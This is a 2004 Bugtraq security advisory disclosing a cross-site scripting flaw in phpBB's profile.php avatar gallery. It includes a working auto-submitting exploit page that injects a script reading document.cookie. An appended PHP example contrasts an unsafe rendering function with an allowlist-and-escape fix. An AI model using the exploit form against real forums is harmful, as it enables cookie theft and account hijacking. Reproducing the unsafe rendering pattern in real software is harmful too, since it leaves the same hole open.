Date: 21 Mar 2004 03:36:19 -0000
From: Cheng Peng Su <apple_soup@....com>
To: bugtraq@...urityfocus.com
Subject: phpBB profile.php Cross Site Scripting Vulnerability





#####################################################################

 Advisory Name : phpBB profile.php Cross Site Scripting Vulnerability
  Release Date : Mar 21,2004 
   Application : phpBB
       Version : phpBB 2.0.6d or others?
      Platform : PHP
    Vendor URL : http://www.phpbb.com/
        Author : Cheng Peng Su(apple_soup_at_msn.com)
     
#####################################################################

 Proof of Concept:
  
     This vuln is in profile.php. When you click [Show Gallery], phpBB 
  shows you the avatar gallery and asks you to choose one for yourself.
  The hole is in that form: after it is submitted, phpBB uses the value of 
  "avatarselect" directly as the path of the gallery, without filtering
  any illegal characters.
   
 Exploit:
  
  -------------exploit.htm--------------
  <form name='f' action="http://site/profile.php?mode=editprofile" method="post">
  <input name="avatarselect" value='" >&lt;script&gt;alert(document.cookie)&lt;/script&gt;'>
  <input type="submit" name="submitavatar" value="Select avatar">
  </form>
  <script>
  window.onload=function()
   {
    document.all.submitavatar.click();
   }
  </script>
  ---------------end-------------------
  
 Contact:
 
  Cheng Peng Su
  Class 1,Senior 2,High school attached to Wuhan University
  Wuhan,Hubei,China(430072)
  apple_soup_at_msn.com
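
The class of fix for the flaw described above, as an added example that is not part of the original post and is not phpBB's own code: the submitted "avatarselect" value is checked against the known gallery directories before it is used as a path, and is HTML-escaped where it is written back into the page. The function names, the "gallery_dir" field and the directory list are hypothetical.

```php
<?php
// Added illustration, not phpBB source. All names here are hypothetical.

// Constructed list standing in for the sub-directories of the avatar gallery.
$gallery_dirs = ['animals', 'people', 'misc'];

// "Before": the request value is written into the page unchanged, so a
// double quote closes the attribute and the rest is parsed as markup.
function render_gallery_field_unsafe(string $avatarselect): string
{
    return '<input type="hidden" name="gallery_dir" value="' . $avatarselect . '">';
}

// Step 1: allowlist. Only an exact match with a known directory name is
// accepted, which also rejects "../" sequences before any path is built.
function select_gallery_dir(string $avatarselect, array $allowed): ?string
{
    return in_array($avatarselect, $allowed, true) ? $avatarselect : null;
}

// Step 2: escape at output. ENT_QUOTES encodes both quote characters, so the
// value cannot leave the attribute even if step 1 is later relaxed.
function render_gallery_field(string $avatarselect, array $allowed): string
{
    $dir = select_gallery_dir($avatarselect, $allowed) ?? $allowed[0];
    return '<input type="hidden" name="gallery_dir" value="'
        . htmlspecialchars($dir, ENT_QUOTES, 'UTF-8') . '">';
}

// The value the advisory's form submits in "avatarselect".
$submitted = '" ><script>alert(document.cookie)</script>';

// Unsafe rendering: the attribute is closed early and a script element follows.
echo render_gallery_field_unsafe($submitted), "\n";

// Hardened rendering: the value is not a known directory, so the first
// allowed directory is used instead.
echo render_gallery_field($submitted, $gallery_dirs), "\n";

// A legitimate selection passes through unchanged.
echo render_gallery_field('people', $gallery_dirs), "\n";

// Escaping alone, shown for the case where no allowlist is available.
echo htmlspecialchars($submitted, ENT_QUOTES, 'UTF-8'), "\n";
```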

